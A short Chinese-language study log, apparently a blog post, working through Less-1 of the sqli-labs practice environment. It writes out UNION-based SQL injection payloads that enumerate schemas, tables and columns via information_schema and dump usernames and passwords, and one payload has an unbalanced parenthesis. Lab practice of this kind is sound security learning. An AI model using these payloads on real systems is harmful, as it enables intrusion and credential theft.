php学习告一段落,接下来的时间就是web渗透的练习了,先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象。之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关。
less1
尝试and1=2,不为数值注入
加单引号报错,判断为单引号字符注入
判断表有几行数据,order by 4–+时报错
用union联合查询有无显示位
查询数据库名
?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
查询表名
?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查询user的列名
?id=1' AND 1=2 union (select group_concat(column_name) from information_schema.columns where table_name='users'--+
查询用户名跟密码
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+